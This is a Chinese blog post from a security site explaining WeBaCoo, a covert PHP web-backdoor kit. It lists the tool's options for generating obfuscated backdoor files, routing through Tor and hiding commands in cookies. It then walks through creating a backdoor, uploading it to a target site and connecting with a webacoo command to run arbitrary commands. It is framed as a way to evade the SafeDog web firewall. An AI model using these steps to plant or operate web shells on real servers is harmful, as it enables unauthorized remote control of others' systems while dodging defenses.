蜗蜗侠's Blog-关注网络安全移动版

主页 > 黑客/白帽 > Linux_Kali >

PHP后门:Webacoo 可过狗

WeBaCoo (Web Backdoor Cookie) script-kit是一个小巧的、隐蔽的php后门,它提供了一个可以连接远程web服务器并执行php代码的终端。WeBaCoo使用HTTP响应头 传送命令结果,shell命令经base64编码后隐藏在Cookie头中。
PHP后门:Webacoo  可过狗 - sn0w - 雪花 -  root@sn0w.top
 
 帮助

-g     Generate backdoor code (-o is required) //生成后门文件

-f      FUNCTION PHP System function to use //使用php函数 FUNCTION 1: system (default) 2: shell_exec 3: exec 4: passthru 5: popen

-o     OUTPUT Generated backdoor output filename //生成后门的文件地址/文件名

-r      Return un-obfuscated backdoor code //生成混淆后的后门代码

-t       Establish remote "terminal" connection (-u is required) //连接后门文件

-u      URL Backdoor URL //后门地址 -e CMD Single command execution mode (-t and -u are required) //执行CMD命令

-m     METHOD HTTP method to be used (default is GET) //使用HTTP方法

-c      C_NAME Cookie name (default: "M-cookie")

-d      DELIM Delimiter (default: New random for each request)

-a      AGENT HTTP header user-agent (default exist)

-p      PROXY Use proxy (tor, ip:port or user:pass:ip:port) //使用代理服务器

-v      LEVEL Verbose level //显示等级

LEVEL
0: no additional info (default) //不显示
1: print HTTP headers //输出http头
2: print HTTP headers + data //输出http头+数据

-l       LOG Log activity to file //输出日志文件

-h       Display help and exit //显示帮助

update       Check for updates and apply if any //更新

我们生成一个后门文件:
PHP后门:Webacoo  可过狗 - sn0w - 雪花 -  root@sn0w.top
此操作会产生一个使用system函数并且经过混淆后的后门文件,如图(整理后)
PHP后门:Webacoo  可过狗 - sn0w - 雪花 -  root@sn0w.top
我们将后门文件传到目标网站内(我这里使用的本地测试)执行
 PHP后门:Webacoo  可过狗 - sn0w - 雪花 -  root@sn0w.top
 
连接后门文件:

webacoo -t -u http://host/backdoor.php

PHP后门:Webacoo  可过狗 - sn0w - 雪花 -  root@sn0w.top
可以执行任意命令
PHP后门:Webacoo  可过狗 - sn0w - 雪花 -  root@sn0w.top
 更多用法自己开发
PHP后门:Webacoo  可过狗 - sn0w - 雪花 -  root@sn0w.top
2016年10月19日  过狗
PHP后门:Webacoo  可过狗 - sn0w - 雪花 -  root@sn0w.top

(责任编辑:蜗蜗侠)